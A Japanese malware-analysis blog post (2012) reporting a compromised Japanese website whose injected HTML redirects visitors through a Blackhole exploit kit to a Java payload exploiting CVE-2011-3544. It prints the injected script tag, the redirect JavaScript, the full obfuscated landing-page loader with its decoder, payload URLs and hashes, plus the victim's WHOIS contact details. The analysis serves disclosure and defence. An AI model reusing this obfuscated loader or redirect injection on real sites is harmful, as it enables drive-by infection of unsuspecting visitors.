火曜日, 3月 27, 2012

#OCJP-028: 「b-dash.jp / 110.50.202.195」ウェブサーバでBlackhole経由「REDIRECTOR」HTMLファイルに感染されて、アクセスしたユーザが「Qai.jar」Javaマルウェア(CVE-2011-3544)へ飛ばされます!


* * ENGLISH REPORT ARE HERE * *
今回は今流行っているQai.jarのマルウェアを日本のサイトで発見しました。また「Blackhole」経由のマルウェアである事が調査の上で分かりました。日本のウェブ脆弱性のあるサイトにHTMLマルウェアファイルがインジェクトされて、外にあるJavaScriptファイルを動かされ、Qai.jarのサーバにリダイレクトされて、Qai.jarをダウンロードしてしまう仕組みです。詳しくは下記となります↓

■感染されたウェブサーバ情報↓

b-dash.jp / 110.50.202.195

■感染されたURL↓

hxxp://www.b-dash.jp/5FP2YpGU/index.html hxxp://b-dash.jp/5FP2YpGU/index.html hxxp://110.50.202.195/5FP2YpGU/index.html

■マルウェア種類説明↓

アファイル  :「などなど.html」又は「などなど.js」又は「などなど.php」 マルウェア種類: JavaScript Obfuscated Trojan JavaScript Redirector マルウェア名 : Exploit:Java/CVE-2011-3544.BG, Exploit:Java/Blacole.ES マルウェア機能: マルウェアサイトへJavascriptでREDIRECTされています、 説明     : 本件のサンプルではBLACKHOLE EXPLOIT PACKのURLへ飛ばされると。 PCのJAVA脆弱性(CVE-2011-3544)狙う.jarマルウェアがダウンロードされてしまいます。

■どうやって見つけたのか?

下記のスパムのURLに本件のURLを発見しました。 ↑上記のスパムはK-SHIELDメール・フィルターアプライアンスにブロックされた状況で、 確認した時に本件の調査を行いました。

■ダウンロード証拠↓

--21:41:19-- hxxp://b-dash.jp/5FP2YpGU/index.html => `index.html' Resolving b-dash.jp... 110.50.202.195 Connecting to b-dash.jp|110.50.202.195|:80... connected. hxxp request sent, awaiting response... 200 OK Length: 155 [text/html] 100%[====================================>] 155 --.--K/s 21:41:19 (5.88 MB/s) - `index.html' saved [155/155] --22:27:33-- hxxp://www.b-dash.jp/5FP2YpGU/index.html => `index.html' Resolving www.b-dash.jp... 110.50.202.195 Connecting to www.b-dash.jp|110.50.202.195|:80... connected. hxxp request sent, awaiting response... 200 OK Length: 155 [text/html] 100%[====================================>] 155 --.--K/s 22:27:33 (5.95 MB/s) - `index.html' saved [155/155] --22:28:46-- hxxp://110.50.202.195/5FP2YpGU/index.html => `index.html.1' Connecting to 110.50.202.195:80... connected. hxxp request sent, awaiting response... 200 OK Length: 155 [text/html] 100%[====================================>] 155 --.--K/s 22:28:46 (3.78 MB/s) - `index.html.1' saved [155/155]

■マルウェア調査内容↓ [Path] / filename MD5 sum (Please click to see VT result↓) ----------------------------------------------------------------- index.html dddbb9957ee206141588deef662442f5 ←TROJAN js.js d3f469a73c94e8490deab380dacd5929 ←TROJAN Qai.jar b307484e98ef3c6d81d66bfab549d387 ←PAYLOAD! showthread.php 5301b4507b67279162de837aa34742c1 ←TROJAN 上記ダウンロードした「index.html」ファイルがマルウェア関係のファイルです。 中身は↓

>cat index.html <html> <h1>WAIT PLEASE</h1> <h3>Loading...</h3> <script type="text/javascript" src="hxxp://aplicacionesfacebook.co/ogjrnZBv/js.js"> </script> </html>
↑このURLをクリックしたらブラウザーが下記の様になって↓ さらに、裏ではhxxp://aplicacionesfacebook.co/ogjrnZBv/js.jsのJAVASCRIPTをダウンロードと実行してしまいます。 「js.js」の中身を見たら下記のように確認が出来ました↓
--21:42:11-- hxxp://aplicacionesfacebook.co/ogjrnZBv/js.js => `js.js' Resolving aplicacionesfacebook.co... 209.239.123.49 Connecting to aplicacionesfacebook.co|209.239.123.49|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 78 [application/javascript] 100%[====================================>] 78 --.--K/s 21:42:12 (2.86 MB/s) - `js.js' saved [78/78]

>cat js.js

document.location='hxxp://88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff';
↑これをみたらBlackholeのEXPLOIT KITのURLだと確認が出来ました。 さっきの続きなんですが、このURLにブラウザが飛ばされています。 実はどんな物かというと↓
--21:43:18-- hxxp://88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff => `showthread.php@t=d7ad916d1c0396ff' Connecting to 88.85.99.44:8080... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] [ <=> ] 18,773 27.64K/s 21:43:20 (27.59 KB/s) - `showthread.php@t=d7ad916d1c0396ff' saved [18773]

> cat showthread.php

<html><body> <span style="display:none;">safsaf('<G;ME=FL.OJAL=(\'d;=FL=Jfd@YfxD=9K= O9AL H9?= AK DG9<AF?...dW@YfdW;=FL=Jfd@Jf\')c>MF;LAGF =F<7J=<AJ=;L()SULJQ SN9J xDM?AFl=L=;LeSN=JKAGFb"X._.^",F9E=b"xDM?AFl=L=;L",@9F<D=Jb>MF;LAGF(;, :,9)SJ=LMJF >MF;LAGF()S;(:,9)UU,AKl=>AF=<b>MF;LAGF(:)SJ=LMJF LQH=G&g t; :!e"MF<=>AF=<"U,AKiJJ9Qb>MF;LAGF(:)SJ=LMJF(W9JJ9QWA).L=KL(w:B=;L. HJGLGLQH=.LG{LJAF?.;9DD(:))U,AKnMF;b>MF;LAGF(:)SJ=LMJF LQH=G> :ee">MF;L AGF"U,AK{LJAF?b>MF;LAGF(:)SJ=LMJF LQH=G> :ee"KLJAF?"U,AKvMEb>MF;LAGF(:) SJ=LMJF LQH=G> :ee"FME:=J"U,AK{LJvMEb>MF;LAGF(:)SJ=LMJF(LQH=G> :ee"KLJA F?"&&(W4<W).L=KL(:))U,?=LvMEz=?PbW34<534<4.47,-5*W,KHDALvMEz=?PbW34.47, : : H9J9E F9E=e4"9DDGO{;JAHLi;;=KK4" N9DM=e\'"+9D+"\' Wf"cnD9K@7G:B+e"dH9J9E F9E=e\' xD9Q\' N9DM=e\'X\' Wf"cnD9K@7G:B+e"d=E:=< KJ;e\'"+>F9E=+".KO>\' A<e\ 'KO>7A<\' F9E=e\'KO>7A<\'"cnD9K@7G:B+e"9DDGO{;JAHLi;;=KKe\'"+9D+"\'" cnD9K@7G:B+e"LQH=e\'9HHDA;9LAGFWP-K@G;CO9N=->D9K@\'"cnD9K@7G:B+e"OA<L@e\'Y X\' @=A?@Le\'YX\'f"cnD9K@7G:B+e"dW=E:=<f"cnD9K@7G:B+e"dWG:B=;Lf"cN9J G{H9Fe&l t;G;ME=FL.;J=9L=mD=E=FL("KH9F")c<G;ME=FL.:G<Q.9HH=F<k@AD<(G{H9F)cG{H 9F.AFF=Jp|ute')</span><span style="display:none;">safsaf('nD9K@7G:BcUK=L|AE=GML( =F<7J=<AJ=;L,`XXX)cUKHDX()c')</span><script> try{new document.getElementsByTagName("body").prototype}catch(q){s=-0.1;}if(wind ow.document){function safsaf(b){a+=b;}}a=[]; v="val"; try{new String("a").prototype.q}catch(hjkql){e=this['e'+v];cc=1;fr=1;} dd=document.getElementsByTagName("span"); for(i=0;i<dd.length;i++){ e(dd[i].innerHTML); } a=a.replace(/</g, "<"); a=a.replace(/>/g, ">"); a=a.replace(/&/g, "&"); ch="c"+"h"+"a"+"r"+"Code"; v=m=e; md='a'; c=""; i=7-6-1; h="S"; if(fr)qq=e(h+"t"+"ring"); ch=ch+"At"; qweqwe=1; if(qweqwe)qq2=e("qq")["fro"+"mC"+"harC"+"ode"]; while(-15049+5-5<i*-1){ vv=a[((1)?"sub":"")+"str"](i,1); vvv=vv[ch](0); x=vvv; if ((vvv>=47) && (vvv<87)){ r2=qq2(vvv+40); } else if((vvv>=87)&&(vvv<127)){ r2=qq2(vvv-40); } else { r2=vv; } r=c; if(e)c=r+r2; i=i+1; } hh=c; w=v; if(cc)z=hh; w(""+z); </script></body></html>

↑obfuscated SPAN経由のJAVASCRIPTを発見しました。 短くしますと、色々DECODEしたら下記のURLが出て来ました↓

hxxp://88.85.99.44:8080/Qai.jar

上記のファイル(Qai.jar)が本件のマルウェアのPAYLOADです。 ファイルの形は↓

File name: Qai.jar File size: 16.7 KB ( 17116 bytes ) File type: ZIP/Archive MD5: b307484e98ef3c6d81d66bfab549d387 Detection ratio: 6 / 43 Analysis date: 2012-03-26 13:15:28 UTC ( 1 分 ago ) Result: [CLICK]

↑見た目では、CVE-XXX-XXXX経由のJAVAマルウェアです。 JAVAマルウェアは殆どJAVAやPDFの脆弱性を狙って感染仕組みを作りますので、 問題は、本件のサンプルにはどんなCVEを狙うのか調査を続けます。 因みに私は今自宅でJARの行動分析調査環境が無いので、他の方法調査で実行します。 Qai.jarを転回したら下記のファイルが出て来ました↓ ↑中身はバイナリーですので、見るとややこしいから大好きなdecompilerを使いましょう↓ ↑よーく調査したらふくざつなSTRINGオペレーション/シムレーションが多いですね。 因みに別の方法もありますが、decompilerを使わなくても調査が出来ます、 JavaのSDKを使ったら「.java」を転回が出来ます↓ JREバーション5をRATでインストールしましたので、それで下記のコマンドを実行したら↓

java -verbose class [filename.class] > nantoka.txt
そして、全てjava runtimeコールを見えるはずですので、結果は↓ Javaの最近出た脆弱性情報とBlackholeのバーション情報をクロスチェックしたら下記の情報を発見↓ ↑本件のJARはCVE-2011-3544の脆弱性を使っている可能性が高いですので、 本件JARのruntime分析をクロスチェックしました↓ ↑ 結果は↓
1. 上記の画像で分かるようにURLの動きあがると発見しました。 そういう意味ではインターネットからのダウンロード動きがあると確認が出来ました。 2. ファイル保存動きがあると確認しました。 3. 上記の1と2の動き前にの上で脆弱性を起こすトレースがありました (PrivilegedExceptionAction、PrivilegedActionException、PrivilegedAction) 4. java権限と関係無くファイルを実行するトレースを確認しました。
ここ迄は、本件のマルウェアはCVE-2011-3544の脆弱性を使いシステム権限を潰すし、 ファイルをダウンロードし保存する仕組みかと思います。 システムファイルのコールがあるという事はシステムに登録動きがあるかと思われます。 少し前に似たようなマルウェアがありまひたので、全て下記のrigistryを最後に実行する形になりましたので、 恐らく本マルウェアもそうだと思います↓
regsrv32.exe –s
↑今迄の考えがいいかどうかを、次はJARのコードをREVERSE ENGINEERINGで解けましょう。 調査は下記となります↓

■REVERSINGメモ↓ 本マルウェアコードは全て情報が暗号化されており、下記はその暗号を解く為のステップのメモ↓ uc.classには$stringの目的ははっきり見えます↓ ↑その中に沢山variableが必要なので、下記の暗号された長い$stringに情報が入っています↓ ↑さらに未だ足りないのでシムレーションでコンパイルしたらエラーが出ました(泣 一応出来た$stringもまた暗号化された物になり…切替したら下記迄の結果が分かった↓ ↑未だ解けない所が沢山あるので、時間がかかりそう、一応URLがあるのは理解しました。 ここ迄はダウンロード仕組みがあるとREVERSINGで分かりました。 CVE脆弱性についての証明は?↓ 別の方法でコードの中にjava virtual環境のexploitコード情報を発見しました↓ ↑これを見たら最近RHINOの脆弱性っぽいと思って、確認の為に下記のPoCの情報があります↓ 1. Metasploitコード: http://downloads.securityfocus.com/vulnerabilities/exploits/50218.rb 2. Java Applet Rhino Script Engine Remote Code Execution 3. Exploitデモ・ビデオ:http://www.youtube.com/embed/4xI9USYl8P0 ↑をチェックしたらCVE-2011-3544のPoCのパターンです。後、別途下記の様なマシンコードもあります↓ ↑こっちにも少しパターンが似てますが…(ライン2) 今までの情報は上記のBlackholeバーションEXPLOITにマッチが出来ました↓ 上記のREVERSING調査結果基づき、1)ダウンロードと2)CVE-2011-3544の脆弱性POCがると確認出来ました。 色んなリファレンスを見たら本件のマルウェア種類は間違いなく下記となります↓

Exploit:Java/CVE-2011-3544.BG Exploit:Java/Blacole.ES
本件のマルウェアが現在流行っている最中です、アンチウイルスの検知率は未だ低いですし、 あちこちの感染が発見されています、日本迄にこの感染が来ましたとこのブログには証明証拠となります。

世界には本件のマルウェアのリファレンスが未だ少ない、現在流行っている最中ですが下記2件があります↓

■感染されたドメイン/IP情報に付いて(手続き/連絡先の為)

[Domain Name] B-DASH.JP [Registrant] b-dash [Name Server] ns4.cpi.ad.jp [Name Server] ns5.cpi.ad.jp [Created on] 2001/06/16 [Expires on] 2012/06/30 [Status] Active [Last Updated] 2011/07/01 01:05:05 (JST) Contact Information: [Name] b-dash [Email] n-mitsuyo@livedoor.com [Email] m-nan@b-dash.jp [Email] b-dash@b-dash.jp [Postal code] 106-0031 [Postal Address] Hirota Bldg 2F,3-17-34, Nishiazabu,Minato-ku, Tokyo,106-0031,Japan [Phone] 03-3475-7795 [Phone] 03-3475-7793 [Phone] 03-3475-7794 [Fax] 03-3475-7792 inetnum: 110.50.200.0 - 110.50.207.255 netname: CPI-NET descr: KDDI Web Communications Inc. country: JP admin-c: YM12747JP tech-c: YM12747JP remarks: This information has been partially mirrored by APNIC from remarks: JPNIC. To obtain more specific information, please use the remarks: JPNIC WHOIS Gateway at remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client remarks: defaults to Japanese output, use the /e switch for English remarks: output) changed: apnic-ftp@nic.ad.jp 20090602 changed: apnic-ftp@nic.ad.jp 20090824 source: JPNIC
----
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.

3 件のコメント:

  1. 世界で現在流行っている最新のpayload URL↓
    (必ずPol.jarとQai.jarがセットで提供されている)

    2012/03/28_04:44 79.137.237.66/content/Qai.jar -
    2012/03/28_04:44 79.137.237.66/content/Pol.jar -
    2012/03/28_04:40 69.64.47.151/data/Qai.jar -
    2012/03/28_04:27 199.255.236.212/data/Qai.jar -
    2012/03/28_04:26 199.255.236.212/content/Pol.jar

    返信削除
  2. 本件の感染事件に付いて、感染されたファイルが未だ残っています。
    報告してから11日間が立ったけど…

    証拠↓

    Sun Apr 8 14:10:47 JST 2012

    --14:08:53-- http://b-dash.jp/5FP2YpGU/index.html
    => `index.html'
    Resolving b-dash.jp... 110.50.202.195
    Connecting to b-dash.jp|110.50.202.195|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 155 [text/html]
    100%[====================================>] 155 --.--K/s
    14:08:53 (5.69 MB/s) - `index.html' saved [155/155]


    $ cat index.html
    <html>
    <h1>WAIT PLEASE</h1>
    <h3>Loading...</h3>
    <script type="text/javascript" src="http://aplicacionesfacebook.co/ogjrnZBv/js.
    js"></script>

    </html>

    返信削除
  3. 新しい感染も発見しました、このサイトのWordPress脆弱性が全然直してくれないみたいですね。

    Wed Apr 11 01:11:22 JST 2012

    --01:06:02-- hxxp://b-dash.jp/ALjNJEpW/index.html
    => `index.html'
    Resolving b-dash.jp... 110.50.202.195
    Connecting to b-dash.jp|110.50.202.195|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 155 [text/html]
    100%[====================================>] 155 --.--K/s
    01:06:02 (5.09 MB/s) - `index.html' saved [155/155]

    ↑これで2件のexploit packからの攻撃が来たよ…

    返信削除